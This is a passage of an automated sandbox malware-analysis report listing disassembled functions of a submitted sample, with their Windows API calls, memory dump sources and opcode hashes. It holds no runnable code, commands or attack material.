                      • Part of subcall function 006DF5AD: lstrcmpiW.KERNEL32(00000000,?,006DE1C4,?,?,?,006DEFB7,00000000,000000EF,00000119,?,?), ref: 006DF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,006DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006DE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 006DE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,006DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006DE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 2775b7ee8b28125b7c4a7de4a00934605bd6f7bd0b567ebbfe83a8fa234cd71d
                    • Instruction ID: e70cd1068c39f2ced0ee3c307aba1c46f6c008758dd0e15ca43894b3fb9c5600
                    • Opcode Fuzzy Hash: 2775b7ee8b28125b7c4a7de4a00934605bd6f7bd0b567ebbfe83a8fa234cd71d
                    • Instruction Fuzzy Hash: 6711AF36500205EFCB25AF64DC45D7A77BAFF45350B40812BE806CB350EB729951C7A4
                    Function 006B5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 006B5351
                      • Part of subcall function 006A594C: __FF_MSGBANNER.LIBCMT ref: 006A5963
                      • Part of subcall function 006A594C: __NMSG_WRITE.LIBCMT ref: 006A596A
                      • Part of subcall function 006A594C: RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000000,?,?,?,006A1013,?), ref: 006A598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 19a2e97a8996408cf8d220e4ac3cf4ee156d4c5b1aa6e7bdb0c59c4a517a8288
                    • Instruction ID: 6321f05a1998e6c81d41aa03f4c81b8366afdf431f6228f10e82f3be7d963d6b
                    • Opcode Fuzzy Hash: 19a2e97a8996408cf8d220e4ac3cf4ee156d4c5b1aa6e7bdb0c59c4a517a8288
                    • Instruction Fuzzy Hash: 71110872404A159ECF303F74AC057DD37D65F023A0B10452EF60696391EFB58D819B58
                    Function 006E40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006E40D1
                    • _memset.LIBCMT ref: 006E40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006E4144
                    • CloseHandle.KERNEL32(00000000), ref: 006E414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: f8f323a02c4e184c448f60bfd403648c4a666e69257312eb91cc863955235b76
                    • Instruction ID: cc06661a4e85d9f9df4fc775638364cd24d7f2ece377390496725d85dad3c5a7
                    • Opcode Fuzzy Hash: f8f323a02c4e184c448f60bfd403648c4a666e69257312eb91cc863955235b76
                    • Instruction Fuzzy Hash: AC11AB75901328BAD7309BB59C4DFEBBB7CEF45760F1042AAF908D7280D6744E808BA4
                    Function 006F667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006E7B20,?,?,00000000), ref: 00685B8C
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006E7B20,?,?,00000000,?,?), ref: 00685BB0
                    • gethostbyname.WSOCK32(?,?,?), ref: 006F66AC
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F66B7
                    • _memmove.LIBCMT ref: 006F66E4
                    • inet_ntoa.WSOCK32(?), ref: 006F66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 60a2a532f4ffcbc02b147724ffd65f5a07dea653600b3ab10c7f39ee5a1f532e
                    • Instruction ID: 5bbbcdbd3c71078f75fa9438fdebde9f0a0c82a43cec5f347f8952258011c5a7
                    • Opcode Fuzzy Hash: 60a2a532f4ffcbc02b147724ffd65f5a07dea653600b3ab10c7f39ee5a1f532e
                    • Instruction Fuzzy Hash: F9116335500508AFCB44FBA4DD96DEE77BABF14310B148269F502A72A1DF30AE04CB65
                    Function 006D9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006D9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006D9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006D906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006D9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 3bb98031a7d78166e4b15215305db3f8e62e8ca20ba65e8a708bc41ad3e47a48
                    • Instruction ID: d372341f52c0bbb3d1acbf4427ab816edd8c4b8d84e57f47d9b9ecc16be7022f
                    • Opcode Fuzzy Hash: 3bb98031a7d78166e4b15215305db3f8e62e8ca20ba65e8a708bc41ad3e47a48
                    • Instruction Fuzzy Hash: 07114C79D00218FFDB10DFA5C884E9DBB75FB48310F204196E904B7350D6726E11DBA4
                    Function 00681290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 006812D8
                    • GetClientRect.USER32(?,?), ref: 006BB84B
                    • GetCursorPos.USER32(?), ref: 006BB855
                    • ScreenToClient.USER32(?,?), ref: 006BB860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: cc6dc2a04af1e44a93a6e77215c8445a7cfa484262744620b9f650154e139a3e
                    • Instruction ID: 87034f1b7c73db2bc2f8959351c771f9a32484402a92f469263f3240522d7d82
                    • Opcode Fuzzy Hash: cc6dc2a04af1e44a93a6e77215c8445a7cfa484262744620b9f650154e139a3e
                    • Instruction Fuzzy Hash: A0113A35900119EFCB10EFA4D8959FE77BDEB06310F004656F901EB251DB34BA928BA9
                    Function 006E1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: ba42d0f49e3132793ae05acdaf6cb3c8bd5b077b4608c964541f8046b796507e
                    • Instruction ID: e1daa5118d634466031d8296209b210e529faf3421a946d369c1b41053c093f2
                    • Opcode Fuzzy Hash: ba42d0f49e3132793ae05acdaf6cb3c8bd5b077b4608c964541f8046b796507e
                    • Instruction Fuzzy Hash: C8118E31C0261CD7CF00EFA6D848AEEBB79FF0A701F148159E940BA240CB349560DBDA
                    Function 006B7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: f9a9c4af787ba85db7ad002f1e5e53e80f548f34418c1f9a1ca1c54afc2d5977
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 410180B204414ABBCF525E84DC018EE3F23BF99340F088515FA1868131C237CAB1AB81
                    Function 0070B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 0070B59E
                    • ScreenToClient.USER32(?,?), ref: 0070B5B6
                    • ScreenToClient.USER32(?,?), ref: 0070B5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0070B5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 5e0a3507ff45ed39f1091fae787280daafe1c2be0fe0e1796b90b639a0ad81e9
                    • Instruction ID: 8847ddff12bae08926fefd5c1a68d16412daa26e45b2120ab5954c1c35d541c7
                    • Opcode Fuzzy Hash: 5e0a3507ff45ed39f1091fae787280daafe1c2be0fe0e1796b90b639a0ad81e9
                    • Instruction Fuzzy Hash: 381146B5D00209EFDB51CF99C8449EEFBF9FB08310F108166E914E3620D735AA658F54
                    Function 0070B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0070B8FE
                    • _memset.LIBCMT ref: 0070B90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00747F20,00747F64), ref: 0070B93C
                    • CloseHandle.KERNEL32 ref: 0070B94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 40ecaf3e7e96627c70fd638aad59b0fc84cfbdd711f4af548d6b895efe93c027
                    • Instruction ID: 442b271344f584fe52e30b757b39323e5e68773734fe192f6823d2e4ad518a44
                    • Opcode Fuzzy Hash: 40ecaf3e7e96627c70fd638aad59b0fc84cfbdd711f4af548d6b895efe93c027
                    • Instruction Fuzzy Hash: 79F05EB6544310BBE3102B61AC06FBB7A9CEB0A754F008471FB08D5292E77A5D06C7AC
                    Function 006E6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 006E6E88
                      • Part of subcall function 006E794E: _memset.LIBCMT ref: 006E7983
                    • _memmove.LIBCMT ref: 006E6EAB
                    • _memset.LIBCMT ref: 006E6EB8
                    • LeaveCriticalSection.KERNEL32(?), ref: 006E6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: fa149210b852a75f1937ccc3ff1d3ee130ec07c91f785b1871c3c0376d83e73a
                    • Instruction ID: 733628443bbbbb65c93aa01a0a55d16f6bba2a9eefb2905d19db772b999f5a11
                    • Opcode Fuzzy Hash: fa149210b852a75f1937ccc3ff1d3ee130ec07c91f785b1871c3c0376d83e73a
                    • Instruction Fuzzy Hash: 3DF0543A100210ABCF516F55DC85A49BB2AEF45320F04C065FE085F217CB35E911DBB8
                    Function 0070C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0068134D
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068135C
                      • Part of subcall function 006812F3: BeginPath.GDI32(?), ref: 00681373
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0070C030
                    • LineTo.GDI32(00000000,?,?), ref: 0070C03D
                    • EndPath.GDI32(00000000), ref: 0070C04D
                    • StrokePath.GDI32(00000000), ref: 0070C05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: ea0d6137d7a448c58e89f879c7d63c8bf073b052971a81f23d35f45a824236a8
                    • Instruction ID: c6f9e02a4d0cdaa6fc96b9d06f752a531a2f338667137da19eb27908e44c752e
                    • Opcode Fuzzy Hash: ea0d6137d7a448c58e89f879c7d63c8bf073b052971a81f23d35f45a824236a8
                    • Instruction Fuzzy Hash: A3F0BE31000219FBDB226F50AC09FCE3F99AF06310F04C201FA11614E28BBD4661CBD9
                    Function 006DA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006DA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006DA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 006DA3B3
                    • AttachThreadInput.USER32(00000000), ref: 006DA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: 331beb5d9e3fa253c21342d4783f8b4d9aad471363864449138ae66118d30a30
                    • Instruction ID: 1a439f7f9b2467e08deba01766fd68ff7acd27e12de472712de1e2a7cc00008c
                    • Opcode Fuzzy Hash: 331beb5d9e3fa253c21342d4783f8b4d9aad471363864449138ae66118d30a30
                    • Instruction Fuzzy Hash: A7E03931545328FADB205BA2DC0CED73F2EEF167A1F008125F508C4560CA76C541CBA5
                    Function 00682218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00682231
                    • SetTextColor.GDI32(?,000000FF), ref: 0068223B
                    • SetBkMode.GDI32(?,00000001), ref: 00682250
                    • GetStockObject.GDI32(00000005), ref: 00682258
                    • GetWindowDC.USER32(?,00000000), ref: 006BC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 006BC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 006BC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 006BC112
                    • GetPixel.GDI32(00000000,?,?), ref: 006BC132
                    • ReleaseDC.USER32(?,00000000), ref: 006BC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 4848c22e0e8596184d98c2631f2cf2e232a8fa4ec3f840431d5f5ca990f2726d
                    • Instruction ID: 38960aa90977bbe17d5572d60e9e60f45d3ee3859829309dfe401b35264efadd
                    • Opcode Fuzzy Hash: 4848c22e0e8596184d98c2631f2cf2e232a8fa4ec3f840431d5f5ca990f2726d
                    • Instruction Fuzzy Hash: E7E06D32100248EADB315F68FC0D7D83B11EB05332F00C366FA69981E18B764A90DB11
                    Function 006D8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 006D8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,006D882E), ref: 006D8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006D882E), ref: 006D8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,006D882E), ref: 006D8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: cc7d8391dee9d83c2eb4e502c378325b511d09795c92e201f99bf7dd763f2978
                    • Instruction ID: c4bea09e23b8cb774ac4e5d25e3faf03dee77b0940febed476db96595e5f3486
                    • Opcode Fuzzy Hash: cc7d8391dee9d83c2eb4e502c378325b511d09795c92e201f99bf7dd763f2978
                    • Instruction Fuzzy Hash: A8E04F36A42211DBD7305FB06E0CB963BACAF50792F048928F245CA040DE3884418B65
                    Function 006C2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 006C2187
                    • GetDC.USER32(00000000), ref: 006C2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006C21B1
                    • ReleaseDC.USER32(?), ref: 006C21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 9a50d67d5c8fd92ac591f8d2575892f86d1ecc71576375f109eb313aacdcb5a7
                    • Instruction ID: 6cda65e9f2e23ea5482fc905e9179b44ce4039e9216d6a06717705881cb11852
                    • Opcode Fuzzy Hash: 9a50d67d5c8fd92ac591f8d2575892f86d1ecc71576375f109eb313aacdcb5a7
                    • Instruction Fuzzy Hash: BAE0E575800604EFDB51AFA0C808AAD7BB2EB4C350F10C529F95A97620CF7991429F55
                    Function 006C219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 006C219B
                    • GetDC.USER32(00000000), ref: 006C21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006C21B1
                    • ReleaseDC.USER32(?), ref: 006C21D2
